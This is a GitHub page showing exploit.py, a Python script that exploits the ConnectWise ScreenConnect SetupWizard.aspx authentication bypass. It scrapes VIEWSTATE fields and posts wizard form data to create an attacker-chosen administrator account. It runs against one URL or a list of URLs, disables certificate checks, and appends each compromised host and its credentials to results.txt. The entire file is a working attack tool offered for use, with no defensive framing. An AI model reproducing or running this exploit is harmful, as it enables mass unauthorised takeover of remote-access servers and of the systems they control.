-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
91 lines (75 loc) · 3.81 KB
/
exploit.py
File metadata and controls
91 lines (75 loc) · 3.81 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
# Based on: https://raw.githubusercontent.com/jhonnybonny/auth_bypass_connectwise_screenconnect/main/bypass.py
import requests
import re
import argparse
from colorama import Fore, Style
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("--username", help="username to add", required=True, action="store")
parser.add_argument("--password", help="password to add (must be at least 8 characters in length)", required=True, action="store")
parser.add_argument("--urls", help="path to the file containing URLs")
parser.add_argument("--url", help="run only on this URL")
args = parser.parse_args()
if args.url is None and args.urls is None:
parser.error('Either --url or --urls must be provided.')
requests.urllib3.disable_warnings()
urls = []
if args.url:
urls.append(args.url)
else:
try:
with open(args.urls, 'r') as f:
for line in f:
urls.append(line.strip())
except FileNotFoundError:
print("Error: File '{}' not found.".format(args.urls))
exit(1)
except Exception as e:
print("Error occurred while reading file:", e)
exit(1)
# Iterate over each URL and perform actions
for url_from_file in urls:
print(f"{Fore.LIGHTMAGENTA_EX} Target:{Style.RESET_ALL} {url_from_file} ")
print(f"{Fore.LIGHTMAGENTA_EX} Username:{Style.RESET_ALL} {args.username} ")
print(f"{Fore.LIGHTMAGENTA_EX} Password:{Style.RESET_ALL} {args.password} ")
try:
# Send initial request
initial_request = requests.get(url=url_from_file + "/SetupWizard.aspx/", verify=False, timeout=5)
initial_request.raise_for_status() # Raises an HTTPError for bad status codes
# Extract required data from the response
viewstate_1 = re.search(r'value="([^"]+)"', initial_request.text).group(1)
viewgen_1 = re.search(r'VIEWSTATEGENERATOR" value="([^"]+)"', initial_request.text).group(1)
# Prepare data for the next request
next_data = {
"__EVENTTARGET": '',
"__EVENTARGUMENT": '',
"__VIEWSTATE": viewstate_1,
"__VIEWSTATEGENERATOR": viewgen_1,
"ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton": "Next"
}
# Send the next request
next_request = requests.post(url=url_from_file + "/SetupWizard.aspx/", data=next_data, verify=False)
# Extract required data from the response
exploit_viewstate = re.search(r'value="([^"]+)"', next_request.text).group(1)
exploit_viewgen = re.search(r'VIEWSTATEGENERATOR" value="([^"]+)"', next_request.text).group(1)
# Prepare data for the exploit request
exploit_data = {
"__LASTFOCUS": '',
"__EVENTTARGET": '',
"__EVENTARGUMENT": '',
"__VIEWSTATE": exploit_viewstate,
"__VIEWSTATEGENERATOR": exploit_viewgen,
"ctl00$Main$wizard$userNameBox": args.username,
"ctl00$Main$wizard$emailBox": args.username + "@poc.com",
"ctl00$Main$wizard$passwordBox": args.password,
"ctl00$Main$wizard$verifyPasswordBox": args.password,
"ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton": "Next"
}
# Send the exploit request
exploit_request = requests.post(url=url_from_file + "/SetupWizard.aspx/", data=exploit_data, verify=False)
print(f"\n{Fore.CYAN} Successfully added user {Style.RESET_ALL}\n\n")
with open('results.txt', 'a') as f:
f.write(f'{url_from_file}\n{args.username}:{args.password}\n\n\n')
except requests.exceptions.RequestException as e:
print(f"\nUnable to connect to the target server: {e}\n")
except (AttributeError, IndexError, KeyError, ValueError) as e:
print(f"\nError processing response from the server: {e}\n")